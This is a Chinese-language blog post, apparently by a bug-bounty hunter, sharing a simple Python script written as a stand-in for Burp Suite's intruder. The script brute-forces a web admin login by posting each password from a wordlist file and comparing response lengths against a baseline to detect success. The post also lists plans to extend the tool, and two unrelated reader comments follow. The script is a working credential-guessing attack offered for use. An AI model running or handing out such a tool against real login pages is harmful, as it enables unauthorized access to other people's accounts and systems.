[爆破小记]分享一个简单的爆破脚本

某天晚上,看到某SRC公众号发了推文,想着赶紧撸一波漏洞,已经好久没有挖洞的我,赶紧打开了我的burpsuite神器,然而抓包一套流程下来,发现并没有attack按钮?破解burpsuite的大神表示不再维护,所以自己写了一个简单的python脚本

立一个FLAG,下次一定完善这个爆破脚本

TASK:

  • 支持POST爆破
  • 支持类似burp一样的变量识别
  • 支持字段排列组合
  • 支持数据包对比、排序

能用的脚本如下:

import requests
url="https://blog.dyboy.cn/admin/"
n=1
username=input("请输入用户名")
data2={'username':username,'password':'00000000','Login':'Login'}
headers={'cookie':'name=dyboy'}
response2=requests.post(url,data2,headers=headers)
text2=response2.text
f=open("pass.txt","r+")
for i in f:
    password=i.strip()
    data1={'username':username,'password':password,'Login':'Login'}
    response1=requests.post(url,data1,headers=headers)
    text1=response1.text
    print("第:", n, "次,尝试密码:", password, "HTTP包长度:", len(text1))
    n=n+1
    if (text1!=text2) and len(text1)!=len(text2):
        print("\n成功!")
        print("用户名为:",username)
        print("密码为:",password)
        break

脚本文件中的pass.txt,小伙伴们自己去找就好了,一行一个password!

发表评论 / Comment

用心评论~

金玉良言 / Appraise
Mr.WuLV 1
2020-11-22 02:40
初看和我用的一个主题,细看,还是一个主题  -,-
到底是哪个作者抄袭哪个作者呢,哈
1LV 1
2020-11-19 02:20
在哪里工作